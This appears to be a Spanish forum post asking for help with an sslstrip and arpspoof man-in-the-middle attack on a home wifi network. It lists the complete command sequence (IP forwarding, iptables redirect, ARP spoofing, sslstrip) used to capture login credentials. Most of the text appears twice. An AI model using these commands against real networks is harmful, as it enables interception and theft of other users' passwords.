Estoy utilizando Backtrack 5 para intentar snifar el trafico https de mi red wifi.
Tras realizar el ataque cuando entro a una pagina https desde el ordenador victima, me he fijado que si se ha eliminado el ssl (La pagina es http en vez de https, hasta ahi todo perfecto)
Pero cuando introduzco mi user y contraseña para hacer login, al aceptar me vuelve a dirigir a la pagina del login, como que los el user y password fuesen incorrectos.
Al mirar el archivo sslstrip.log veo que las contraseñas han quedado guardadas, como que todo hubiera ido normal.
Los comandos que utilizo son estos:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 (siendo la 1era la victima y la 2a el gateway, aunque lo he probado tambien del reves)
cd /pentest/web/sslstrip
python sslstrip.py -l 8080
Y despues abro el archivo sslstrip.log
Alguien me puede echar una mano?
Gracias de antemano.
Tras realizar el ataque cuando entro a una pagina https desde el ordenador victima, me he fijado que si se ha eliminado el ssl (La pagina es http en vez de https, hasta ahi todo perfecto)
Pero cuando introduzco mi user y contraseña para hacer login, al aceptar me vuelve a dirigir a la pagina del login, como que los el user y password fuesen incorrectos.
Al mirar el archivo sslstrip.log veo que las contraseñas han quedado guardadas, como que todo hubiera ido normal.
Los comandos que utilizo son estos:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 (siendo la 1era la victima y la 2a el gateway, aunque lo he probado tambien del reves)
cd /pentest/web/sslstrip
python sslstrip.py -l 8080
Y despues abro el archivo sslstrip.log
Alguien me puede echar una mano?
Gracias de antemano.